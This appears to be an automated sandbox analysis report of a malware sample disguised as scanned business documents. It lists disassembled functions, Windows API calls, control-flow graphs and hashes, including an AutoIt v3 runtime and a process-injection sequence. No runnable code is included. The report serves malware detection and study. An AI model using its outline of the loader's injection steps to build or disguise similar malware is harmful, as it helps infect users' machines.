                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00282BEF
                                                      • RegisterClassExW.USER32(?), ref: 00282C40
                                                        • Part of subcall function 00282CD4: GetSysColorBrush.USER32(0000000F), ref: 00282D07
                                                        • Part of subcall function 00282CD4: RegisterClassExW.USER32(00000030), ref: 00282D31
                                                        • Part of subcall function 00282CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00282D42
                                                        • Part of subcall function 00282CD4: InitCommonControlsEx.COMCTL32(?), ref: 00282D5F
                                                        • Part of subcall function 00282CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00282D6F
                                                        • Part of subcall function 00282CD4: LoadIconW.USER32(000000A9), ref: 00282D85
                                                        • Part of subcall function 00282CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00282D94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 06731aa7f542c59952751810c5c4c9c173afa842f903d0dba0f0edd5a18e4d7f
                                                      • Instruction ID: 37335a48402ca755b2722f0e0732b3a795a1adfc98687ecec0f1fcb3fc8dc836
                                                      • Opcode Fuzzy Hash: 06731aa7f542c59952751810c5c4c9c173afa842f903d0dba0f0edd5a18e4d7f
                                                      • Instruction Fuzzy Hash: 1D215E78E50314AFDB129FA6EC65BAD7FB8FB08B51F00515AF500A66B0D3B10940CF90
                                                      Function 0028B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0028BB4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: p#5$p#5$p#5$p#5$p%5$p%5$x#5$x#5
                                                      • API String ID: 1385522511-3150480149
                                                      • Opcode ID: 193966bb04a84303b1284a2b4ab2fd05a2db7734076319448af596cc0ee95b67
                                                      • Instruction ID: 0807a049abb721051234ece40a880e6b40792093b8f8f9af74df6a8d92a7d4e4
                                                      • Opcode Fuzzy Hash: 193966bb04a84303b1284a2b4ab2fd05a2db7734076319448af596cc0ee95b67
                                                      • Instruction Fuzzy Hash: DC32DD38A2120A9FDB16DF54C894BBEB7B9EF45304F14805AED05AB3A1C774ED61CB90
                                                      Function 00283170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 758 283170-283185 759 2831e5-2831e7 758->759 760 283187-28318a 758->760 759->760 761 2831e9 759->761 762 2831eb 760->762 763 28318c-283193 760->763 764 2831d0-2831d8 DefWindowProcW 761->764 765 2c2dfb-2c2e23 call 2818e2 call 29e499 762->765 766 2831f1-2831f6 762->766 767 283199-28319e 763->767 768 283265-28326d PostQuitMessage 763->768 769 2831de-2831e4 764->769 801 2c2e28-2c2e2f 765->801 771 2831f8-2831fb 766->771 772 28321d-283244 SetTimer RegisterWindowMessageW 766->772 774 2c2e7c-2c2e90 call 2ebf30 767->774 775 2831a4-2831a8 767->775 770 283219-28321b 768->770 770->769 777 2c2d9c-2c2d9f 771->777 778 283201-283214 KillTimer call 2830f2 call 283c50 771->778 772->770 780 283246-283251 CreatePopupMenu 772->780 774->770 794 2c2e96 774->794 781 2c2e68-2c2e77 call 2ec161 775->781 782 2831ae-2831b3 775->782 786 2c2dd7-2c2df6 MoveWindow 777->786 787 2c2da1-2c2da5 777->787 778->770 780->770 781->770 783 2c2e4d-2c2e54 782->783 784 2831b9-2831be 782->784 783->764 797 2c2e5a-2c2e63 call 2e0ad7 783->797 792 283253-283263 call 28326f 784->792 793 2831c4-2831ca 784->793 786->770 795 2c2dc6-2c2dd2 SetFocus 787->795 796 2c2da7-2c2daa 787->796 792->770 793->764 793->801 794->764 795->770 796->793 802 2c2db0-2c2dc1 call 2818e2 796->802 797->764 801->764 806 2c2e35-2c2e48 call 2830f2 call 283837 801->806 802->770 806->764
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0028316A,?,?), ref: 002831D8
                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0028316A,?,?), ref: 00283204
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00283227
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0028316A,?,?), ref: 00283232
                                                      • CreatePopupMenu.USER32 ref: 00283246
                                                      • PostQuitMessage.USER32(00000000), ref: 00283267
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 972495d7e208042f91ddb6bda368496efe3db885da5d316ab88ef739cfbccd65
                                                      • Instruction ID: 485bf0636fe39fd2f4e39c48ab54c7f1e2891e0aee31aca53e65c23c82e26e1d
                                                      • Opcode Fuzzy Hash: 972495d7e208042f91ddb6bda368496efe3db885da5d316ab88ef739cfbccd65
                                                      • Instruction Fuzzy Hash: 0641293D271205AADB16BF789C1DBBD362DE705F01F044115F906851F1CBE1AE749BA1
                                                      Function 0028DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D%5$D%5$D%5$D%5$D%5D%5$Variable must be of type 'Object'.
                                                      • API String ID: 0-3570658891
                                                      • Opcode ID: 9f2ef1fe7f05f3db2e198f584dc69352bb9b4893eed1fa75fc46969c9e115ecf
                                                      • Instruction ID: faaae4e32aa59fe6cf533f66658268a31426fc1f8a9440984af3345ed6aa51e9
                                                      • Opcode Fuzzy Hash: 9f2ef1fe7f05f3db2e198f584dc69352bb9b4893eed1fa75fc46969c9e115ecf
                                                      • Instruction Fuzzy Hash: C4C2BF79A21205CFDF14EF58C880AADB7B1BF09300F25856AE905AB3A1D375ED61CF91
                                                      Function 032025F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1324 32025f0-320269e call 3200000 1327 32026a5-32026cb call 3203500 CreateFileW 1324->1327 1330 32026d2-32026e2 1327->1330 1331 32026cd 1327->1331 1339 32026e4 1330->1339 1340 32026e9-3202703 VirtualAlloc 1330->1340 1332 320281d-3202821 1331->1332 1333 3202863-3202866 1332->1333 1334 3202823-3202827 1332->1334 1336 3202869-3202870 1333->1336 1337 3202833-3202837 1334->1337 1338 3202829-320282c 1334->1338 1341 3202872-320287d 1336->1341 1342 32028c5-32028da 1336->1342 1343 3202847-320284b 1337->1343 1344 3202839-3202843 1337->1344 1338->1337 1339->1332 1345 3202705 1340->1345 1346 320270a-3202721 ReadFile 1340->1346 1347 3202881-320288d 1341->1347 1348 320287f 1341->1348 1349 32028ea-32028f2 1342->1349 1350 32028dc-32028e7 VirtualFree 1342->1350 1351 320285b 1343->1351 1352 320284d-3202857 1343->1352 1344->1343 1345->1332 1353 3202723 1346->1353 1354 3202728-3202768 VirtualAlloc 1346->1354 1357 32028a1-32028ad 1347->1357 1358 320288f-320289f 1347->1358 1348->1342 1350->1349 1351->1333 1352->1351 1353->1332 1355 320276a 1354->1355 1356 320276f-320278a call 3203750 1354->1356 1355->1332 1364 3202795-320279f 1356->1364 1361 32028ba-32028c0 1357->1361 1362 32028af-32028b8 1357->1362 1360 32028c3 1358->1360 1360->1336 1361->1360 1362->1360 1365 32027a1-32027d0 call 3203750 1364->1365 1366 32027d2-32027e6 call 3203560 1364->1366 1365->1364 1372 32027e8 1366->1372 1373 32027ea-32027ee 1366->1373 1372->1332 1374 32027f0-32027f4 FindCloseChangeNotification 1373->1374 1375 32027fa-32027fe 1373->1375 1374->1375 1376 3202800-320280b VirtualFree 1375->1376 1377 320280e-3202817 1375->1377 1376->1377 1377->1327 1377->1332
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 032026C1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 032028E7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction ID: 704f3aff50724e9df95a5824dba59340fb82e123f91d6b2493ec046bf46294ce
                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction Fuzzy Hash: E7A12874E10209EBDB14CFA4C898BAEB7B5BF48304F20859AE501BB2C1C7759A85CF60
                                                      Function 00282C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1388 282c63-282cd3 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00282C91
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00282CB2
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00281CAD,?), ref: 00282CC6
                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00281CAD,?), ref: 00282CCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: 7f6b080d7e7d2c658996373bc2b273701d5fc609d43d41295d6675ad34274a6d
                                                      • Instruction ID: 4fd0fdcfb36709a1051da5b3e2cbf2f8512d795eb1e70281117f708f77b5317c
                                                      • Opcode Fuzzy Hash: 7f6b080d7e7d2c658996373bc2b273701d5fc609d43d41295d6675ad34274a6d
                                                      • Instruction Fuzzy Hash: 7BF0D4796913907AEB331B27AC18FB72EBDD7CAF61F01505AF900A65B0C6A11850DAB4
                                                      Function 032023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1503 32023b0-32024e6 call 3200000 call 32022a0 CreateFileW 1510 32024e8 1503->1510 1511 32024ed-32024fd 1503->1511 1512 320259d-32025a2 1510->1512 1514 3202504-320251e VirtualAlloc 1511->1514 1515 32024ff 1511->1515 1516 3202520 1514->1516 1517 3202522-3202539 ReadFile 1514->1517 1515->1512 1516->1512 1518 320253b 1517->1518 1519 320253d-3202577 call 32022e0 call 32012a0 1517->1519 1518->1512 1524 3202593-320259b ExitProcess 1519->1524 1525 3202579-320258e call 3202330 1519->1525 1524->1512 1525->1524
                                                      APIs
                                                        • Part of subcall function 032022A0: Sleep.KERNELBASE(000001F4), ref: 032022B1
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 032024DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: UCX4CCKQI365
                                                      • API String ID: 2694422964-3829034217
                                                      • Opcode ID: 9625ef834ae756dd7d652cb8c2b079bee33651227709e5552c9cd1d55fc74a2c
                                                      • Instruction ID: a070a9c96db93a2b35321f8b2233adb66b0691d6c809171ccc11beab73e98b24
                                                      • Opcode Fuzzy Hash: 9625ef834ae756dd7d652cb8c2b079bee33651227709e5552c9cd1d55fc74a2c
                                                      • Instruction Fuzzy Hash: DE51A630D14349EBEF14DBE4C854BEEBB79AF48300F004599E609BB2C1D6B91B49CBA5
                                                      Function 002F2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1527 2f2947-2f29b9 call 2c1f50 call 2f25d6 call 29fe0b call 285722 call 2f274e call 28511f call 2a5232 1542 2f29bf-2f29c6 call 2f2e66 1527->1542 1543 2f2a6c-2f2a73 call 2f2e66 1527->1543 1548 2f29cc-2f2a6a call 2ad583 call 2a4983 call 2a9038 call 2ad583 call 2a9038 * 2 1542->1548 1549 2f2a75-2f2a77 1542->1549 1543->1549 1550 2f2a7c 1543->1550 1553 2f2a7f-2f2b3a call 2850f5 * 8 call 2f3017 call 2ae5eb 1548->1553 1552 2f2cb6-2f2cb7 1549->1552 1550->1553 1554 2f2cd5-2f2cdb 1552->1554 1592 2f2b3c-2f2b3e 1553->1592 1593 2f2b43-2f2b5e call 2f2792 1553->1593 1557 2f2cdd-2f2ced call 29fdcd call 29fe14 1554->1557 1558 2f2cf0-2f2cf6 1554->1558 1557->1558 1592->1552 1596 2f2b64-2f2b6c 1593->1596 1597 2f2bf0-2f2bfc call 2ae678 1593->1597 1598 2f2b6e-2f2b72 1596->1598 1599 2f2b74 1596->1599 1604 2f2bfe-2f2c0d DeleteFileW 1597->1604 1605 2f2c12-2f2c16 1597->1605 1601 2f2b79-2f2b97 call 2850f5 1598->1601 1599->1601 1611 2f2b99-2f2b9e 1601->1611 1612 2f2bc1-2f2bd7 call 2f211d call 2adbb3 1601->1612 1604->1552 1607 2f2c18-2f2c7e call 2f25d6 call 2ad2eb * 2 call 2f22ce 1605->1607 1608 2f2c91-2f2ca5 CopyFileW 1605->1608 1609 2f2cb9-2f2ccf DeleteFileW call 2f2fd8 1607->1609 1632 2f2c80-2f2c8f DeleteFileW 1607->1632 1608->1609 1610 2f2ca7-2f2cb4 DeleteFileW 1608->1610 1619 2f2cd4 1609->1619 1610->1552 1616 2f2ba1-2f2bb4 call 2f28d2 1611->1616 1625 2f2bdc-2f2be7 1612->1625 1626 2f2bb6-2f2bbf 1616->1626 1619->1554 1625->1596 1629 2f2bed 1625->1629 1626->1612 1629->1597 1632->1552
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F2C05
                                                      • DeleteFileW.KERNEL32(?), ref: 002F2C87
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002F2C9D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F2CAE
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002F2CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$Copy
                                                      • String ID:
                                                      • API String ID: 3226157194-0
                                                      • Opcode ID: 8e4124bcdb59c996fda24d9e98332b046e9ca4e1b85fc20dba1231af4154920b
                                                      • Instruction ID: af167d8c52ec37e74a6fa89170c113c765794d8dee69c3e210d98ac543eb648a
                                                      • Opcode Fuzzy Hash: 8e4124bcdb59c996fda24d9e98332b046e9ca4e1b85fc20dba1231af4154920b
                                                      • Instruction Fuzzy Hash: B4B15171D2112DABDF11EFA4CC85EEEBB7DEF49350F1040A6F609E6141EA309A588F61
                                                      Function 002B5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1907 2b5aa9-2b5ace 1908 2b5ad0-2b5ad2 1907->1908 1909 2b5ad7-2b5ad9 1907->1909 1910 2b5ca5-2b5cb4 call 2a0a8c 1908->1910 1911 2b5adb-2b5af5 call 2af2c6 call 2af2d9 call 2b27ec 1909->1911 1912 2b5afa-2b5b1f 1909->1912 1911->1910 1914 2b5b21-2b5b24 1912->1914 1915 2b5b26-2b5b2c 1912->1915 1914->1915 1918 2b5b4e-2b5b53 1914->1918 1919 2b5b4b 1915->1919 1920 2b5b2e-2b5b46 call 2af2c6 call 2af2d9 call 2b27ec 1915->1920 1923 2b5b55-2b5b61 call 2b9424 1918->1923 1924 2b5b64-2b5b6d call 2b564e 1918->1924 1919->1918 1953 2b5c9c-2b5c9f 1920->1953 1923->1924 1935 2b5ba8-2b5bba 1924->1935 1936 2b5b6f-2b5b71 1924->1936 1939 2b5bbc-2b5bc2 1935->1939 1940 2b5c02-2b5c23 WriteFile 1935->1940 1941 2b5b73-2b5b78 1936->1941 1942 2b5b95-2b5b9e call 2b542e 1936->1942 1947 2b5bf2-2b5c00 call 2b56c4 1939->1947 1948 2b5bc4-2b5bc7 1939->1948 1944 2b5c2e 1940->1944 1945 2b5c25-2b5c2b GetLastError 1940->1945 1949 2b5b7e-2b5b8b call 2b55e1 1941->1949 1950 2b5c6c-2b5c7e 1941->1950 1954 2b5ba3-2b5ba6 1942->1954 1955 2b5c31-2b5c3c 1944->1955 1945->1944 1947->1954 1956 2b5bc9-2b5bcc 1948->1956 1957 2b5be2-2b5bf0 call 2b5891 1948->1957 1962 2b5b8e-2b5b90 1949->1962 1951 2b5c89-2b5c99 call 2af2d9 call 2af2c6 1950->1951 1952 2b5c80-2b5c83 1950->1952 1951->1953 1952->1951 1960 2b5c85-2b5c87 1952->1960 1966 2b5ca4 1953->1966 1954->1962 1963 2b5c3e-2b5c43 1955->1963 1964 2b5ca1 1955->1964 1956->1950 1965 2b5bd2-2b5be0 call 2b57a3 1956->1965 1957->1954 1960->1966 1962->1955 1971 2b5c69 1963->1971 1972 2b5c45-2b5c4a 1963->1972 1964->1966 1965->1954 1966->1910 1971->1950 1976 2b5c4c-2b5c5e call 2af2d9 call 2af2c6 1972->1976 1977 2b5c60-2b5c67 call 2af2a3 1972->1977 1976->1953 1977->1953
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JO(
                                                      • API String ID: 0-3222809140
                                                      • Opcode ID: efc0492878468c842b337cc28abdb262128306867a44b827c73631cc06825966
                                                      • Instruction ID: c40c47abb8e96ea4f469ff85055c7c486277085893e0967ae94c0e7f5f317538
                                                      • Opcode Fuzzy Hash: efc0492878468c842b337cc28abdb262128306867a44b827c73631cc06825966
                                                      • Instruction Fuzzy Hash: 0951D271D3062A9FCB11AFA4C945FEEBFB9AF05394F14001AF400AF291DB7599218B61
                                                      Function 00283B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00283B0F,SwapMouseButtons,00000004,?), ref: 00283B40
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00283B0F,SwapMouseButtons,00000004,?), ref: 00283B61
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00283B0F,SwapMouseButtons,00000004,?), ref: 00283B83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 88cc99f3f6724ccace105dee97bb47aa17cded22f5a13f4e964f3ef872151512
                                                      • Instruction ID: 1dfa25dc2907cabe1609de14b5cb25eb0963502832e24b970fc21278f55e2578
                                                      • Opcode Fuzzy Hash: 88cc99f3f6724ccace105dee97bb47aa17cded22f5a13f4e964f3ef872151512
                                                      • Instruction Fuzzy Hash: F9112AB9521209FFDB21DFA5DC44AEEB7BCEF08B89B108459A805D7150E271DF509760
                                                      Function 032012A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03201A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03201AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03201B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                      • Instruction ID: 1e819c53ab65cffe7b9fd2fdfbcf4cc542c5820eb419b942e47adff2804193d2
                                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                      • Instruction Fuzzy Hash: FA620A34A24258DBEB24CFA4C840BDEB376EF58300F1091A9D10DEB2D1E7B59E85CB59
                                                      Function 00283923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002C33A2
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00283A04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
